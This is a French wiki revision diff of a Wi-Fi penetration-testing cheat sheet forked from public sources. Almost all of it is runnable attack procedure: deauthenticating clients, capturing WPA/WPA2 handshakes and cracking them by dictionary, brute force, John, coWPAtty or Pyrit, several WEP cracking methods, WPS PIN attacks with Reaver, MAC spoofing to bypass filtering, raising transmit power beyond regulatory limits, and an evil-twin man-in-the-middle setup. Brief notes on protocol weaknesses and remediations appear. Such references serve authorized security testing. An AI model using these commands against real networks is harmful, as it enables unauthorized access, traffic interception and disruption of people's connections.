Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
cheatsheet_wifi [2021/12/09 13:51] M0N5T3R créée |
cheatsheet_wifi [2021/12/09 13:59] (Version actuelle) M0N5T3R |
||
---|---|---|---|
Ligne 1: | Ligne 1: | ||
- | Cette page est un fork de https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_WirelessTesting.txt | + | Cette page est un fork de https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ |
+ | **WPA2 PSK attack with aircrack-ng suite.** | ||
- | WPA2 PSK attack with aircrack-ng suite. | ||
--------------------------------------- | --------------------------------------- | ||
+ | |||
+ | |||
ifconfig wlan1 # check wireless IFace | ifconfig wlan1 # check wireless IFace | ||
+ | |||
sudo airmon-ng check kill # kill issue causing processes | sudo airmon-ng check kill # kill issue causing processes | ||
+ | |||
sudo airmon-ng start wlan1 # start monitor mode | sudo airmon-ng start wlan1 # start monitor mode | ||
+ | |||
sudo airodump-ng wlan1mon # start capturing | sudo airodump-ng wlan1mon # start capturing | ||
+ | |||
sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output | sudo airodump-ng --bssid 64:66:B3:6E:B0:8A -c 11 wlan1mon -w output | ||
+ | |||
sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client | sudo aireplay-ng --deauth 5 -a 64:66:B3:6E:B0:8A wlan1mon # deauthenticate the client | ||
+ | |||
sudo aircrack-ng output-01.cap dict # crack the passphrase | sudo aircrack-ng output-01.cap dict # crack the passphrase | ||
- | WPA PSK attack with aircrack-ng suite. | + | |
+ | |||
+ | |||
+ | **WPA PSK attack with aircrack-ng suite.** | ||
-------------------------------------- | -------------------------------------- | ||
+ | |||
+ | |||
Place your wireless card into Monitor Mode | Place your wireless card into Monitor Mode | ||
+ | |||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
+ | |||
+ | |||
Detect all available wireless AP’s and clients | Detect all available wireless AP’s and clients | ||
+ | |||
airodump-ng mon0 | airodump-ng mon0 | ||
+ | |||
+ | |||
Setting adapter channel | Setting adapter channel | ||
+ | |||
iwconfig mon0 channel <channel_number> | iwconfig mon0 channel <channel_number> | ||
+ | |||
+ | |||
Capturing the four-way handshake | Capturing the four-way handshake | ||
+ | |||
airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0 | airodump-ng --channel <channel_number> --bssid <bssid> --write capture mon0 | ||
+ | |||
+ | |||
You can capture the handshake passively (it takes time) or de-authenticate a client. | You can capture the handshake passively (it takes time) or de-authenticate a client. | ||
+ | |||
+ | |||
De-authentication attack | De-authentication attack | ||
+ | |||
aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0 | aireplay-ng --deauth 3 -a <BSSID> -c <client_mac> mon0 | ||
+ | |||
+ | |||
Deauth every client - aireplay-ng -0 5 -a <bssid> mon0 | Deauth every client - aireplay-ng -0 5 -a <bssid> mon0 | ||
+ | |||
+ | |||
Dictionary Attack | Dictionary Attack | ||
+ | |||
aircrack-ng -w passwords.lst capture-01.cap | aircrack-ng -w passwords.lst capture-01.cap | ||
+ | |||
+ | |||
Brute force Attack | Brute force Attack | ||
+ | |||
crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap | crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap | ||
- | WEP attack with aircrack-ng suite. | + | |
+ | |||
+ | |||
+ | **WEP attack with aircrack-ng suite.** | ||
---------------------------------- | ---------------------------------- | ||
+ | |||
+ | |||
Place your wireless card into Monitor Mode | Place your wireless card into Monitor Mode | ||
+ | |||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
+ | |||
+ | |||
Detect all available wireless AP’s and clients | Detect all available wireless AP’s and clients | ||
+ | |||
airodump-ng mon0 | airodump-ng mon0 | ||
+ | |||
+ | |||
Setting adapter channel | Setting adapter channel | ||
+ | |||
iwconfig mon0 channel <channel_number> | iwconfig mon0 channel <channel_number> | ||
+ | |||
+ | |||
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) | airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) | ||
+ | |||
+ | |||
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) | aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) | ||
+ | |||
+ | |||
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) | aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) | ||
+ | |||
+ | |||
aircrack-ng -b (bssid) (file name-01.cap) | aircrack-ng -b (bssid) (file name-01.cap) | ||
- | Rogue Access Point Testing | + | |
+ | |||
+ | |||
+ | **Rogue Access Point Testing** | ||
-------------------------- | -------------------------- | ||
+ | |||
+ | |||
# ifconfig wlan0 down | # ifconfig wlan0 down | ||
+ | |||
# iw reg set BO | # iw reg set BO | ||
+ | |||
# iwconfig wlan0 txpower 0 | # iwconfig wlan0 txpower 0 | ||
+ | |||
# ifconfig wlan0 up | # ifconfig wlan0 up | ||
+ | |||
# airmon-ng start wlan0 | # airmon-ng start wlan0 | ||
+ | |||
# airodump-ng --write capture mon0 | # airodump-ng --write capture mon0 | ||
+ | |||
+ | |||
root@backbox:/home/backbox# ifconfig wlan1 down | root@backbox:/home/backbox# ifconfig wlan1 down | ||
+ | |||
root@backbox:/home/backbox# iw reg set BO | root@backbox:/home/backbox# iw reg set BO | ||
+ | |||
root@backbox:/home/backbox# ifconfig wlan1 up | root@backbox:/home/backbox# ifconfig wlan1 up | ||
+ | |||
root@backbox:/home/backbox# iwconfig wlan1 channel 13 | root@backbox:/home/backbox# iwconfig wlan1 channel 13 | ||
+ | |||
root@backbox:/home/backbox# iwconfig wlan1 txpower 30 | root@backbox:/home/backbox# iwconfig wlan1 txpower 30 | ||
+ | |||
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto | root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto | ||
- | Reaver | + | |
+ | |||
+ | |||
+ | **Reaver** | ||
------ | ------ | ||
+ | |||
+ | |||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
+ | |||
airodump-ng wlan0 | airodump-ng wlan0 | ||
+ | |||
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv | ||
+ | |||
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 | reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1 | ||
- | Pixie WPS | + | |
+ | |||
+ | |||
+ | **Pixie WPS** | ||
--------- | --------- | ||
+ | |||
+ | |||
airmon-ng check | airmon-ng check | ||
+ | |||
airmon-ng start wlan0 | airmon-ng start wlan0 | ||
+ | |||
airodump-ng wlan0mon --wps | airodump-ng wlan0mon --wps | ||
+ | |||
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 | reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1 | ||
- | Wireless Notes | + | |
+ | |||
+ | |||
+ | **Wireless Notes** | ||
-------------- | -------------- | ||
+ | |||
+ | |||
Wired Equivalent Privacy (WEP) | Wired Equivalent Privacy (WEP) | ||
+ | |||
RC4 stream cipher w/ CRC32 for integrity check | RC4 stream cipher w/ CRC32 for integrity check | ||
+ | |||
- Attack: | - Attack: | ||
+ | |||
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. | By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs. | ||
+ | |||
- Remediation: | - Remediation: | ||
+ | |||
Use WPA2 | Use WPA2 | ||
+ | |||
+ | |||
Wifi Protected Access (WPA) | Wifi Protected Access (WPA) | ||
+ | |||
Temporal Key Integrity Protocol (TKIP) Message Integrity Check | Temporal Key Integrity Protocol (TKIP) Message Integrity Check | ||
+ | |||
- Attack: | - Attack: | ||
+ | |||
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. | ||
+ | |||
- Remediation: | - Remediation: | ||
+ | |||
Use long-keys | Use long-keys | ||
+ | |||
+ | |||
Wifi Protected Access 2 (WPA2) | Wifi Protected Access 2 (WPA2) | ||
+ | |||
Advanced Encryption Standard (AES) | Advanced Encryption Standard (AES) | ||
+ | |||
- Attack: | - Attack: | ||
+ | |||
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. | Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station. | ||
+ | |||
- Remediation: | - Remediation: | ||
+ | |||
WPA-Enterprise | WPA-Enterprise | ||
+ | |||
+ | |||
---------------------------------------------------------- | ---------------------------------------------------------- | ||
+ | |||
all credits to @uceka.com for the following section (found below) original work found here https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ | all credits to @uceka.com for the following section (found below) original work found here https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ | ||
+ | |||
---------------------------------------------------------- | ---------------------------------------------------------- | ||
- | WIRELESS ANTENNA | + | |
+ | |||
+ | **WIRELESS ANTENNA** | ||
---------------- | ---------------- | ||
+ | |||
+ | |||
Open the Monitor Mode | Open the Monitor Mode | ||
+ | |||
root@uceka:~# ifconfig wlan0mon down | root@uceka:~# ifconfig wlan0mon down | ||
+ | |||
root@uceka:~# iwconfig wlan0mon mode monitor | root@uceka:~# iwconfig wlan0mon mode monitor | ||
+ | |||
root@uceka:~# ifconfig wlan0mon up | root@uceka:~# ifconfig wlan0mon up | ||
+ | |||
Increase Wi-Fi TX Power | Increase Wi-Fi TX Power | ||
+ | |||
root@uceka:~# iw reg set B0 | root@uceka:~# iw reg set B0 | ||
+ | |||
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto> | root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto> | ||
+ | |||
#txpower is 30 (generally) | #txpower is 30 (generally) | ||
+ | |||
#txpower is depends your country, please googling | #txpower is depends your country, please googling | ||
+ | |||
root@uceka:~# iwconfig | root@uceka:~# iwconfig | ||
+ | |||
Change WiFi Channel | Change WiFi Channel | ||
+ | |||
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)> | root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)> | ||
- | WEP CRACKING | + | |
+ | |||
+ | |||
+ | **WEP CRACKING** | ||
------------ | ------------ | ||
+ | |||
+ | |||
Method 1 : Fake Authentication Attack | Method 1 : Fake Authentication Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
#What’s my mac? | #What’s my mac? | ||
+ | |||
root@uceka:~# macchanger --show wlan0mon | root@uceka:~# macchanger --show wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon | root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon | root@uceka:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <BSSID> -h <OurMac> wlan0mon | ||
+ | |||
root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName> | root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName> | ||
+ | |||
+ | |||
Method 2 : ARP Replay Attack | Method 2 : ARP Replay Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
#What’s my mac? | #What’s my mac? | ||
+ | |||
root@uceka:~# macchanger --show wlan0mon | root@uceka:~# macchanger --show wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon | root@uceka:~# aireplay-ng -3 -x 1000 -n 1000 -b <BSSID> -h <OurMac> wlan0mon | ||
+ | |||
root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName> | root@uceka:~# aircrack-ng -b <BSSID> <PCAP_of_FileName> | ||
+ | |||
+ | |||
Method 3 : Chop Chop Attack | Method 3 : Chop Chop Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
#What’s my mac? | #What’s my mac? | ||
+ | |||
root@uceka:~# macchanger --show wlan0mon | root@uceka:~# macchanger --show wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon | root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon | root@uceka:~# aireplay-ng -4 -b <BSSID> -h <OurMac> wlan0mon | ||
+ | |||
#Press ‘y’ ; | #Press ‘y’ ; | ||
+ | |||
root@uceka:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2> | root@uceka:~# packetforge-ng -0 -a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2> | ||
+ | |||
root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon | root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon | ||
+ | |||
root@uceka:~# aircrack-ng <PCAP_of_FileName> | root@uceka:~# aircrack-ng <PCAP_of_FileName> | ||
+ | |||
+ | |||
Method 4 : Fragmentation Attack | Method 4 : Fragmentation Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
#What’s my mac? | #What’s my mac? | ||
+ | |||
root@uceka:~# macchanger --show wlan0mon | root@uceka:~# macchanger --show wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon | root@uceka:~# aireplay-ng -1 0 -e <ESSID> -a <BSSID> -h <OurMac> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon | root@uceka:~# aireplay-ng -5 -b <BSSID> -h < OurMac > wlan0mon | ||
+ | |||
#Press 'y' ; | #Press 'y' ; | ||
+ | |||
root@uceka:~# packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2> | root@uceka:~# packetforge-ng -0 -a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2> | ||
+ | |||
root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon | root@uceka:~# aireplay-ng -2 -r <FileName2> wlan0mon | ||
+ | |||
root@uceka:~# aircrack-ng <PCAP_of_FileName> | root@uceka:~# aircrack-ng <PCAP_of_FileName> | ||
+ | |||
+ | |||
Method 5 : SKA (Shared Key Authentication) Type Cracking | Method 5 : SKA (Shared Key Authentication) Type Cracking | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 10 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# ifconfig wlan0mon down | root@uceka:~# ifconfig wlan0mon down | ||
+ | |||
root@uceka:~# macchanger --mac <VictimMac> wlan0mon | root@uceka:~# macchanger --mac <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# ifconfig wlan0mon up | root@uceka:~# ifconfig wlan0mon up | ||
+ | |||
root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon | root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon | root@uceka:~# aireplay-ng --deauth 1 -a <BSSID> -h <FakedMac> wlan0mon | ||
+ | |||
root@uceka:~# aircrack-ng <PCAP_of_FileName> | root@uceka:~# aircrack-ng <PCAP_of_FileName> | ||
- | WPA / WPA2 CRACKING | + | |
+ | |||
+ | |||
+ | **WPA / WPA2 CRACKING** | ||
------------------- | ------------------- | ||
+ | |||
+ | |||
Method 1 : WPS Attack | Method 1 : WPS Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# apt-get install reaver | root@uceka:~# apt-get install reaver | ||
+ | |||
root@uceka:~# wash -i wlan0mon -C | root@uceka:~# wash -i wlan0mon -C | ||
+ | |||
root@uceka:~# reaver -i wlan0mon -b <BSSID> -vv -S | root@uceka:~# reaver -i wlan0mon -b <BSSID> -vv -S | ||
+ | |||
#or, Specific attack | #or, Specific attack | ||
+ | |||
root@uceka:~# reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S | root@uceka:~# reaver -i -c <Channel> -b <BSSID> -p <PinCode> -vv -S | ||
+ | |||
+ | |||
Method 2 : Dictionary Attack | Method 2 : Dictionary Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP> | root@uceka:~# aircrack-ng -w <WordlistFile> -b <BSSID> <Handshaked_PCAP> | ||
+ | |||
+ | |||
Method 3 : Crack with John The Ripper | Method 3 : Crack with John The Ripper | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# cd /pentest/passwords/john | root@uceka:~# cd /pentest/passwords/john | ||
+ | |||
root@uceka:~# john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName> | root@uceka:~# john -wordlist=<Wordlist> --rules -stdout|aircrack-ng -0 -e <ESSID> -w - <PCAP_of_FileName> | ||
+ | |||
+ | |||
Method 4 : Crack with coWPAtty | Method 4 : Crack with coWPAtty | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID> | root@uceka:~# cowpatty -r <FileName> -f <Wordlist> -2 -s <SSID> | ||
+ | |||
root@uceka:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName> | root@uceka:~# genpmk -s <SSID> -f <Wordlist> -d <HashesFileName> | ||
+ | |||
root@uceka:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID> | root@uceka:~# cowpatty -r <PCAP_of_FileName> -d <HashesFileName> -2 -s <SSID> | ||
+ | |||
+ | |||
Method 5 : Crack with Pyrit | Method 5 : Crack with Pyrit | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# pyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough | root@uceka:~# pyrit -r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough | ||
+ | |||
root@uceka:~# pyrit -i <Wordlist> import_passwords | root@uceka:~# pyrit -i <Wordlist> import_passwords | ||
+ | |||
root@uceka:~# pyrit -e <ESSID> create_essid | root@uceka:~# pyrit -e <ESSID> create_essid | ||
+ | |||
root@uceka:~# pyrit batch | root@uceka:~# pyrit batch | ||
+ | |||
root@uceka:~# pyrit -r <PCAP_of_FileName> attack_db | root@uceka:~# pyrit -r <PCAP_of_FileName> attack_db | ||
+ | |||
+ | |||
Method 6 : Precomputed WPA Keys Database Attack | Method 6 : Precomputed WPA Keys Database Attack | ||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 1 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# kwrite ESSID.txt | root@uceka:~# kwrite ESSID.txt | ||
+ | |||
root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt | root@uceka:~# airolib-ng NEW_DB --import essid ESSID.txt | ||
+ | |||
root@uceka:~# airolib-ng NEW_DB --import passwd <DictionaryFile> | root@uceka:~# airolib-ng NEW_DB --import passwd <DictionaryFile> | ||
+ | |||
root@uceka:~# airolib-ng NEW_DB --clean all | root@uceka:~# airolib-ng NEW_DB --clean all | ||
+ | |||
root@uceka:~# airolib-ng NEW_DB --stats | root@uceka:~# airolib-ng NEW_DB --stats | ||
+ | |||
root@uceka:~# airolib-ng NEW_DB --batch | root@uceka:~# airolib-ng NEW_DB --batch | ||
+ | |||
root@uceka:~# airolib-ng NEW_DB --verify all | root@uceka:~# airolib-ng NEW_DB --verify all | ||
+ | |||
root@uceka:~# aircrack-ng -r NEW_DB <Handshaked_PCAP> | root@uceka:~# aircrack-ng -r NEW_DB <Handshaked_PCAP> | ||
- | FIND HIDDEN SSID | + | |
+ | |||
+ | |||
+ | **FIND HIDDEN SSID** | ||
---------------- | ---------------- | ||
+ | |||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> wlan0mon | root@uceka:~# airodump-ng -c <Channel> --bssid <BSSID> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 20 -a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
##BYPASS MAC FILTERING | ##BYPASS MAC FILTERING | ||
+ | |||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | root@uceka:~# airodump-ng -c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon | ||
+ | |||
root@uceka:~# aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon | root@uceka:~# aireplay-ng -0 10 --a <BSSID> -c <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# ifconfig wlan0mon down | root@uceka:~# ifconfig wlan0mon down | ||
+ | |||
root@uceka:~# macchanger --mac <VictimMac> wlan0mon | root@uceka:~# macchanger --mac <VictimMac> wlan0mon | ||
+ | |||
root@uceka:~# ifconfig wlan0mon up | root@uceka:~# ifconfig wlan0mon up | ||
+ | |||
root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon | root@uceka:~# aireplay-ng -3 -b <BSSID> -h <FakedMac> wlan0mon | ||
- | MAN IN THE MIDDLE ATTACK | + | |
+ | |||
+ | |||
+ | **MAN IN THE MIDDLE ATTACK** | ||
------------------------ | ------------------------ | ||
+ | |||
+ | |||
root@uceka:~# airmon-ng start wlan0 | root@uceka:~# airmon-ng start wlan0 | ||
+ | |||
root@uceka:~# airbase-ng -e “<FakeBSSID>” wlan0mon | root@uceka:~# airbase-ng -e “<FakeBSSID>” wlan0mon | ||
+ | |||
root@uceka:~# brctl addbr <VariableName> | root@uceka:~# brctl addbr <VariableName> | ||
+ | |||
root@uceka:~# brctl addif <VariableName> wlan0mon | root@uceka:~# brctl addif <VariableName> wlan0mon | ||
+ | |||
root@uceka:~# brctl addif <VariableName> at0 | root@uceka:~# brctl addif <VariableName> at0 | ||
+ | |||
root@uceka:~# ifconfig eth0 0.0.0.0 up | root@uceka:~# ifconfig eth0 0.0.0.0 up | ||
+ | |||
root@uceka:~# ifconfig at0 0.0.0.0 up | root@uceka:~# ifconfig at0 0.0.0.0 up | ||
+ | |||
root@uceka:~# ifconfig <VariableName> up | root@uceka:~# ifconfig <VariableName> up | ||
+ | |||
root@uceka:~# aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon | root@uceka:~# aireplay-ng -deauth 0 -a <victimBSSID> wlan0mon | ||
+ | |||
root@uceka:~# dhclient3 <VariableName> & | root@uceka:~# dhclient3 <VariableName> & | ||
+ | |||
root@uceka:~# wireshark & | root@uceka:~# wireshark & | ||
+ | |||
;select <VariableName> interface | ;select <VariableName> interface |